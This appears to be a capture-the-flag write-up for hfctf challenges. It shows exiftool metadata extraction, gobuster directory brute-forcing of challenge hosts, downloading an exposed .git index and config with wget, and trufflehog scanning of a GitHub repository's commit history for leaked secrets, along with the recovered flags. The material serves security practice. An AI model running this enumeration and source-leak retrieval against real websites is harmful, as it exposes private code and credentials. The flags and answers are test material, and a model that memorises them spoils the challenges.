Incredibly Savage Book Nerd
This comic book was mint before this…
exiftool ruined_isbn.jpgExifTool Version Number : 12.09
File Name : ruined_isbn.jpg
Directory : .
File Size : 515 kB
...
Text Layer Name : ISBN: 1-200-26505-X ISBN13: 978-1-200-26505-5
Text Layer Text : ISBN: 1-200-26505-X ISBN13: 978-1-200-26505-5
...
Thumbnail Image : (Binary data 4344 bytes, use -b option to extract)
HF-1-200-26505-X978-1-200-26505-5
My favorite book list is RUINED (125)
💂🍚🎹💤🔈💼🌚🍛🍬🔳📩🗿👏🏊👧🔑🐌🌙🐥📃👺🌒🎅🏪🕥📂📆🍙📺🕠👺💸🌋🍣🎪🍇🍖🌕🗽👥👯🎹🔃👽🍚🔬📏🍂🌈🔞🎭🎷🔬👿🐟🔸📆🍇🏩🐪👏📐🐒📴💇🍴🐽💪💈🎵📑👥🐑🔴🍜🔪🏃🌄📚🔟🕓👭📮🕠🎭🎎🕟💻🎹🎈💳🎶📜🐞👔🔔💍👊🍰👺📵🌚🔰👇🔄🕔💗🐬🌌📂🍀🎨💄📀📷🏰🌓🕛🎹🌖👽💧🐰💙🕐👚📫🌁🎋🍅🌇🌓🌎📦🌑📊👱👯🎄👎🍎🔉💹🌋🍼🐾🍠🐃🐵🍘🐁🌁🍄🐄👻🍵🍺📆🌴🍢🏀🔒🎹📬🔹🍝🎣💃📠🕦🍳🐃💐🍑🍁🕔🕡📟👔🔄🐼🍺💂🔅🌄👝📵📔🎳🌾👭🔯🕓🎤🕃🌁🔮🔗🏀🌌🌱👘👆📹🎱🏢🔤🔯🔥🕝💄💑🐻👅🌃💶💚💊📁🐏👋🔺🐔🐴🕢🏫🎡💓🏢🎄🐨🕠🎫👡💣🐺🐾🌻👥📂🔲🔹🐝🔑💈🐁🎄📵🍔📓🏈👾🐃🎄🎧🕟🌄🎷🏨🏦🔗🏫🏯👌🐫🔊🔑🎴🎯🐴💷🔙🔵🔳🍩📡🐗🌜🕣👄🎓🎊🎏👢🎺🐁🎻👹🔞📚🐶💷🔝🏁🐨💕🌊🐥🎹🔀👗👚🐷🐜🐛📈🔯🏁👠🔒📚💧👷👜🍆👾📗💹🏤👡🔍🎐📈🎒📘🔵💮📉🌾🕑🌘💚🌌💘🏊🔢👈🕂🕒🕙📭🕚🎍🏮👈🔳🕤🔇📮💞🍢📇🎋📈🎇🏬🔎🐗🎮🏦🕓🎭🍫👟🏀🌇🐷🎰🔈🎱👾🔅🍒🐖👴🔵🎧💺💶🗻💨🎭🐪🍬🏃👊🍝👐🎬💴💡🍏🕖🏬🍗👅📱🔻🐭💤🌀🍴🌆👷🎆🐘🔺💞📖📖🐽👕🕑🎤🕡💌💍👼🐡📫🍪🔷🕣🏨📤💼💳📙🏡🎺🔂👱👽💛💃🍳🐉🗼🕙🌑🌘💇👞📉🍌👎🏃📹👊👀🔫🌐📘🔂🍔📬👪💻🎬💜📔🍇🌜🔶🐟🍧🌈🐷🐭📎🌷🍄👾🏃🌹💅🐃🌼🐣🎿🍉🍙🕥📡🔥👋💯🎾📦🐰🗿💬👦👷💜📟💖🍭🕡💭🐾🎍🔛🌂📵👨📆🎌👂🐣📝🐀🏧🍻🔃🔦🌘📍🍁📮🐚📡🌏🎐📮🌁👕💇🌋🌊📔🕡🎬🌱👞📌📹🐯🔹🔸🐠💚🏩🔦🔷📎👦🏰🔩🎥👯🕡📰👗🐱💽🌆🐳🎹💺🎪🍓👈👢👴🔡💻👜🐑🌆🎱🐊🍢🔕💌🔹📩🎑🐮🌿🎠🍠🔸🎏🏃🏰🎶🕂💿🐝🕦👣💱🌲🌴🏁🕛🔩👃📞🔔🔯🍪🌚🏀💅🍬🎲🐙💔👭🕦🍟💱👡🏊👵💶🌜📃🔇📎🌔💆🍛👱💫🕧🔔🎷🐂🏣🎌👆👆📹🔝👍💔🍣🍕🐣🍑🍱🔳🐽👯🌵👵🏃🍀🔖🎐🔬🔠📰👹🍎👟🕔🎒👓🍺🌷🕁🐪🍁🎌🍁💘🌉🗼🍥🌽🎂🍺📙🍀🎬📵🌷🐺🐡📰💅🕂💼📳🎒👽🐱📵🐖📆👧🎓🎵🌘💪🐁🎋📌🕐📋🌳🍌🐸🐭🐮📐🌗💍🌿🔫🌓💲🎨📴📹👟👂🕦🔒🍋👬👷📏🎵💐🌄💉👲🎶🎬🕠🎯📼🎃📹🐍👪🍟🔊🍚💯🏆🌸🔦📕📙👸🍐🕚🐝🏈🌸🍜💘👰📬👋🎨👭💍🐚📴🕠🍌🕢💟🍚💨🕣👕🐺🍴🍧🎓👤🍓🏨👜🏇💸🏨🌑🐰👶💺📵💲👵📉💂🏫👜🐦💳💚🎏🐱📕🌋🌖🌁📵🐟🐹👩🎳🎊🐽🍤🔆👧👎📉🕝🍉🕐🎢🔚🐦📞🏩🏫💝💙🌹🎂💧🕓📴🔘🐙🕚🕗📻🍧🌟🕒🕔📘🍆🎇👕👒📡🎅🍖🕘🎈💠📀📎🍲💛🐛💓💤🐕💡🐌👰💨🎭📤🎻🐹🌼🗿🐩🔻🍶🌂🐠💁🌜🎃🎁👢👗💼🏨👢🕟🏨👪🎆🍯💉🕒📂👹🐷📈🎿📴🕖🍖🕤🔺👲🐱🗽🌇🌼🌷💫👚💩🔈🌊🌴🔭🍱🐂🍟💶🌒🔕🍶🌍📁👹👀💋🕔👺🍌📑🐈🍑🎃🍵👡🔍💌🌆🎼🔤🕒👮🍦💽🗿🏠🎦👾🐃📇🐡🕀👺🌅💙🎩📍🍖🔭🐂👻🌱📑📮💶🌚🌔👎👥🌿🔬📵💈🎱🎥👹🌜💻🕜🍪🍒🎈🎇📁🌌💭👹💔🐅👨🌉🍞🐳🎂💇🐯👨📵🔬
Flag not found
The Twelve Labours of Web Coding (dax & Brainmoustache)
VASE #1
URL="https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
===============================================================
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/.htaccess (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/.htpasswd (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/.hta (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/css (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/fonts (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/img (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/index.html (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/js (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/robots.txt (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/server-status (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/static (Status: 301)https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/robots.txt
User-agent: *
Disallow: /dev/URL="https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev"
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
===============================================================
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.hta (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.htpasswd (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.htaccess (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/HEAD (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/server-status (Status: 200)https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/HEAD
ref: refs/heads/masterhttps://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/refs/heads/master
1acc7db4b782b225f149bcfafdbd390cecbdfe53https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/logs/HEAD
0000000000000000000000000000000000000000 1acc7db4b782b225f149bcfafdbd390cecbdfe53 daxAKAhackerman <dax@hackerman.ca> 1605454550 +0000 commit (initial): Initial commitURL="https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git"
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
===============================================================
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/.hta (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/.htaccess (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/.htpasswd (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/config (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/hooks (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/index (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/info (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/logs (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/objects (Status: 301)# Clone any git repository
git clone https://github.com/daxAKAhackerman/test-project.git
cd ./test-project/.git
# Download the index file & config
wget https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/index
wget https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/config
# Show config file contents
cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
# Replace the index file of the git repo by the one downloaded
# List files
git ls-files -s
100644 c89b47928f70bb9fad44144f4d38b752c196f789 0 app/app.go
100644 46c86a74494115cd0e9f1b86f2753f4cf7883f1c 0 app/go.mod
100644 6a7bdfde09da5ee98351ab0d92ab544800235d17 0 app/go.sum
100644 009dc919d5fbc3ea1c146b9a8c02ff0e360bb87f 0 app/handlers/cookie.go
100644 d1dbf279c70f32c33c6eb9384e596dc41b12fbf3 0 app/handlers/crud.go
100644 3f89659fbb008f9b94b4baecc78fba902ab25087 0 app/handlers/flags.go
100644 3e006c02ca33d5b443bac00ecddb9966ebdc5649 0 app/handlers/go.mod
100644 e375ca20d2715dc2af823d739eec08239c921f29 0 app/handlers/go.sum
100644 271c52684e812e7d1b55a3590c9d0b3c59d71483 0 app/models/go.mod
100644 4e8d56970132ea5944672607141dfb8b06a6574a 0 app/models/go.sum
100644 5147176a7af451464ea3b21b4f8da3dd551ebe81 0 app/models/models.go
100644 4cd1d0736cb10731a1ee22d80ecbaac822f4c3bf 0 app/utils/go.mod
100644 afe4eb32709ce02bb7611bd36f0cf425a67abb7b 0 app/utils/utils.go
100644 d6903b91b575633f8fec2239727edb8839d516bf 0 flag.txt
100644 b93d7d6ea54702e98f7603eb5eea48ba5a784ce0 0 go.mod
100644 6a7bdfde09da5ee98351ab0d92ab544800235d17 0 go.sum
100644 04af6441318c03159575c585642c2dc2e500f785 0 main.go
100644 b931da1fb9b9e073aa6b67d3ca1ec58c93161cf8 0 wait-for-it.shFlag not found
VASE #2 – Herd the cattle of Geryon
Sensitive information in Git commit history
This application was created to facilitate the testing phase of the application found here: https://github.com/daxAKAhackerman/test-project.
trufflehog "https://github.com/daxAKAhackerman/test-project.git"-# Use my build script! (I'll make it available eventually)
-# The --unsafe flag can be used to remove the protections that I have placed on the package.json file
-# FLAG-1: HF-tyNjuXASYW4bJQw1cSNZrRQtLKCA34sp
-bash build SRC_FOLDER DST_FOLDER [--unsafe]HF-tyNjuXASYW4bJQw1cSNZrRQtLKCA34sp
VASE #3
“Rustacean Web Application” refers to the Rust programming language. Looking at the source code of the page, there is a link:
https://fe8d0f9a-afd2-43c6-a74e-b33bc34ed88d.webcoding.hfctf.org/<REDACTED>/scr1pt_h3r3